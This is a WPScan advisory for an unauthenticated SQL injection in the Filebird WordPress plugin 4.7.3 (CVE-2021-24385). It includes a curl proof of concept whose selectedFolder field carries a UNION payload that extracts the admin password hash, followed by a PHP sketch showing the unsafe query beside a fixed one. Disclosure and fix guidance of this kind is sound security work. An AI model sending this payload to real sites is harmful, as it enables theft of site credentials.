WPScan

WordPress Plugin Vulnerabilities

Filebird 4.7.3 - Unauthenticated SQL Injection

Description

The Filebird plugin 4.7.3 introduced a SQL injection vulnerability: it builds SQL queries without escaping user input taken from an HTTP POST request. This is a major vulnerability because the unescaped input is passed directly to the get_col function, allowing SQL injection. The REST API endpoint that invokes this function also requires no permissions or authentication, so it can be reached by an anonymous user.

Proof of Concept

curl 'https://example.com/wp-json/filebird/v1/gutenberg-get-images?_locale=user' \
  -H 'accept: application/json, */*;q=0.1' \
  -H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'content-type: application/json' \
  --data-raw '{"isLoading":false,"captions":{},"imagesRemoved":[],"images":[],"selectedFolder":["1) UNION (SELECT user_pass FROM wp_users WHERE ID=1"],"columns":3,"isCropped":true,"hasCaption":false,"linkTo":"none","sortBy":"date","sortType":"DESC","animation":"none","animationEasing":"linear","animationDelay":0,"animationDuration":400,"folders":[{"value":0,"label":"Please choose folder","disabled":true}]}' \
  --compressed 
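
As an added illustration (not Filebird's own source; the function and table names below are hypothetical placeholders), the unsafe pattern the description refers to is shown beside a hardened version: the folder IDs taken from selectedFolder are cast to integers and bound through $wpdb->prepare() before reaching get_col(), and the REST route gains the permission_callback the vulnerable endpoint lacked.

```php
<?php
// Hypothetical sketch of the pattern described above, not Filebird's own code.
// The function and table names (fb_get_images_*, fb_attachment_folder) are placeholders.

// Before: folder IDs from the JSON body are concatenated straight into SQL,
// and the route has no permission check, so any anonymous visitor can reach it.
function fb_get_images_unsafe( WP_REST_Request $request ) {
    global $wpdb;
    $folders = $request->get_param( 'selectedFolder' );  // raw, unescaped user input
    $in      = implode( ',', (array) $folders );          // a string like "1) UNION ..." passes through
    $sql     = "SELECT attachment_id FROM {$wpdb->prefix}fb_attachment_folder WHERE folder_id IN ({$in})";
    return $wpdb->get_col( $sql );
}

// After: every ID is cast to an integer and bound through prepare(), so the
// values can no longer change the structure of the query.
function fb_get_images_safe( WP_REST_Request $request ) {
    global $wpdb;
    $folders = array_map( 'absint', (array) $request->get_param( 'selectedFolder' ) );
    $folders = array_values( array_filter( $folders ) ); // drop 0 / non-numeric leftovers
    if ( empty( $folders ) ) {
        return rest_ensure_response( array() );
    }
    $placeholders = implode( ',', array_fill( 0, count( $folders ), '%d' ) );
    $sql = $wpdb->prepare(
        "SELECT attachment_id FROM {$wpdb->prefix}fb_attachment_folder WHERE folder_id IN ({$placeholders})",
        $folders
    );
    return rest_ensure_response( $wpdb->get_col( $sql ) );
}

// The route registration supplies the permission_callback the vulnerable
// endpoint lacked, plus a schema that rejects non-integer folder IDs up front.
add_action( 'rest_api_init', function () {
    register_rest_route( 'filebird/v1', '/gutenberg-get-images', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'fb_get_images_safe',
        'permission_callback' => function () {
            return current_user_can( 'upload_files' );
        },
        'args'                => array(
            'selectedFolder' => array(
                'type'  => 'array',
                'items' => array( 'type' => 'integer' ),
            ),
        ),
    ) );
} );
```

The 'upload_files' capability is an assumed choice for who may list media by folder; the actual capability a plugin should require depends on what the endpoint exposes.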

Affects Plugins

filebird
Fixed in version 4.7.4

References

CVE
CVE-2021-24385
URL
https://10up.com/blog/2021/security-vulnerability-filebird-wordpress-plugin/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Ravi Chandra (10up)

Submitter

Ravi Chandra (10up)

Submitter website
https://10up.com/
Submitter twitter
10up
Verified

Yes

WPVDB ID
754ac750-0262-4f65-b23e-d5523995fbfa

Timeline

Publicly Published

2021-06-16

Added

2021-06-17

Last Updated

2021-06-25
